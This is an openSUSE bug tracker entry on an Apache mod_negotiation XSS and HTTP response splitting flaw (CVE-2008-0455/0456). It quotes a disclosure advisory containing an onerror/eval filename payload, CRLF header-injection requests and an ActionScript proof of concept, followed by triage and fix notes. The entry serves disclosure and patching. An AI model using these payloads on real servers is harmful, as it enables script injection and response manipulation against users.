Bug 355540

Summary:	VUL-0: Apache mod_negotiation Xss and Http Response Splitting
Product:	[openSUSE] openSUSE 10.3	Reporter:	Ludwig Nussel <lnussel>
Component:	Security	Assignee:	Sonja Krause-Harder <skh>
Status:	RESOLVED WONTFIX	QA Contact:	E-mail List <qa-bugs>
Severity:	Major
Priority:	P5 - None	CC:	meissner, security-team
Version:	Final
Target Milestone:	---
Hardware:	Other
OS:	Other
Whiteboard:	CVE-2008-0456: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Found By:	---	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---
Bug Depends on:
Bug Blocks:	355888
Deadline:	2008-02-20
Attachments:	CVE-2008-0456.diff

Description Ludwig Nussel 2008-01-23 09:09:32 UTC

We received the following report via bugtraq.
The issue is public.

I'm not sure if the described threat is real

Date: Tue, 22 Jan 2008 23:15:52 +0100
From: Minded Security Research Labs <research@mindedsecurity.com>
To: Btq <bugtraq@securityfocus.com>
Subject: Apache mod_negotiation Xss and Http Response Splitting
CC: "(Minded) Stefano Di Paola" <stefano.dipaola@mindedsecurity.com>

Apache mod_negotiation Xss and Http Response Splitting

Date: January 22th, 2008

Tested Versions: Apache <=1.3.39 
                        <= 2.0.61
                        <= 2.2.6

Minded Security ReferenceID:
       MSA01150108

Credits:
        Discovery by 
        Stefano Di Paola of Minded Security 
        stefano.dipaola [_at_] mindedsecurity.com

Severity: Low/Medium

Permalink: 
        http://www.mindedsecurity.com/MSA01150108.html

[ Background ]

>From Apache Mod_Negotiation page:

Content negotiation, or more accurately content selection,
is the selection of the document that best matches the clients
capabilities, from one of several available documents. There are
two implementations of this.
* A type map (a file with the handler type-map) which explicitly
  lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option, where the
  server does an implicit filename pattern match, and choose from
  amongst the results.

[ Summary ]

Mod_negotiation doesn't sanitize filenames in '406 Not Acceptable'
response and '300 Multiple Choices' message body.
This could lead to Xss if the name of the file is controlled by an
attacker (i.e. by previously uploading it).

Moreover, as the list of the filenames is also sent, without being
sanitized, in the response header, it could result in a Http Response
Splitting [1] issue if the name of the file contains '\n' (Line Feed).

[ Analysis ]

I. Cross Site Scripting 

Let's suppose mod_negotiation is enabled and an attacker could upload 
a file with arbitrary name and whatever mime extension.
For example a legit jpeg file named:

<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg

Then by requesting it without extension with Accept header set to
image/jpeg; q=0, 

----------------------------------------------------

GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))>
HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg}
{length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /&lt;img
src=sa 
onerror=eval(document.location.hash.substr(1))&gt; could not be found
on 
this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg">
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> ,
type image/jpeg</li>
</ul>
<hr>

-----------------------------------------------------

As it could be noted, no sanitization of the filename is done,
leading to Xss.

II. Http Response Splitting 

By using a similar technique, Http Response Splitting could be 
triggered if there's some way to set the name of the file like
the following:

'junk
Header: Injected
blah:.jpg'

Then, by requesting the urlencoded file name:

------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected                             <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk
Header: Injected
blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk
Header: Injected
blah:.jpg">junk
Header: Injected
blah:.jpg</a> , type image/jpeg</li>
</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port
80</address>
</body></html>

------------------------------------------------------

As it could be noted, the header response is splitted and "Header:
Injected" is,
indeed injected.

[ Proof of Concept ]

The following actionscript can be used in order to trigger the Xss.

---------------------------------------------------------- 
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
  import flash.display.Sprite;
  import flash.net.*
  public class TestXss extends flash.display.Sprite {
    public function TestXss(){
      var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%
20onerror=eval(document.location.hash.substr(1))>#alert(123)');

      r.method = 'POST';
      r.data = unescape('test');
      r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg;
q=0'));

      navigateToURL(r, '_self');

    }
    }
}
----------------------------------------------------------

[ Credits ]

Stefano di Paola is credited with the discovery of this vulnerability.

[ Disclosure Timeline ]

15/01/2008  Initial vendor notification
16/01/2008  Vendor Confirmed 
21/01/2008  Coordinated public disclosure
22/01/2008  Minded Security Research Lab Advisory

[ Reference ]

[1] "Divide and Conquer, HTTP Response Splitting, Web Cache
Poisoning Attacks, and Related Topics ", Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

[ Disclaimer ]

The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever 
arising out of or in connection with the use or spread of this 
information.
Any use of this information is at the user's own risk.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research@mindedsecurity.com 
for permission.

        Copyright (c) 2008 Minded Security, S.r.l..

              All rights reserved worldwide.

-- 
---
Research Labs
Minded Security S.r.l.

Web: http://www.mindedsecurity.com

Mail: research_at_mindedsecurity.com

Comment 1 Ludwig Nussel 2008-02-01 09:24:49 UTC

CVE-2008-0456

Description
CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP
response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

References
Note: [44]References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.
* BUGTRAQ:20080122 Apache mod_negotiation Xss and Http Response Splitting
* [45]URL:http://www.securityfocus.com/archive/1/archive/1/486847/100/0/threaded
* [46]MISC:http://www.mindedsecurity.com/MSA01150108.html
* BID:27409
* [47]URL:http://www.securityfocus.com/bid/27409
* SECTRACK:1019256
* [48]URL:http://securitytracker.com/id?1019256
* XF:apache-modnegotiation-response-splitting(39893)
* [49]URL:http://xforce.iss.net/xforce/xfdb/39893

Comment 2 Sonja Krause-Harder 2008-02-28 10:45:03 UTC

Tracked in bug #355888

Comment 3 Sonja Krause-Harder 2008-02-28 10:53:34 UTC

Hm, or not...

This is not considered a security issue by the apache project, see 

http://marc.info/?l=apache-httpd-dev&m=120222445311334&w=2

Please reopen if you disagree.

Comment 4 Matthias Weckbecker 2008-03-17 08:43:50 UTC

CVE-2008-0455

Description
Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML
by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

References
Note: [44]References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.
* BUGTRAQ:20080122 Apache mod_negotiation Xss and Http Response Splitting
* [45]URL:http://www.securityfocus.com/archive/1/archive/1/486847/100/0/threaded
* [46]MISC:http://www.mindedsecurity.com/MSA01150108.html
* BID:27409
* [47]URL:http://www.securityfocus.com/bid/27409
* SECTRACK:1019256
* [48]URL:http://securitytracker.com/id?1019256
* XF:apache-modnegotiation-xss(39867)
* [49]URL:http://xforce.iss.net/xforce/xfdb/39867

Comment 5 Thomas Biege 2009-10-14 01:04:04 UTC

CVE-2008-0456: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)

Comment 6 Marcus Meissner 2009-10-29 15:59:55 UTC

added note to cve db

Comment 7 Marcus Meissner 2011-12-13 14:59:14 UTC

apparently was fixed in 2.2.12:

Changes with Apache 2.2.12

...

  *) mod_negotiation: Escape pathes of filenames in 406 responses to avoid
     HTML injections and HTTP response splitting.  PR 46837.
     [Geoff Keating <geoffk apple.com>]

So this is fixed for SLE11 SP1 now.

Comment 8 Marcus Meissner 2011-12-14 08:44:17 UTC

https://issues.apache.org/bugzilla/show_bug.cgi?id=46837

Comment 9 Marcus Meissner 2011-12-14 08:45:31 UTC

Created attachment 467362 [details]
CVE-2008-0456.diff

from apache bugtracker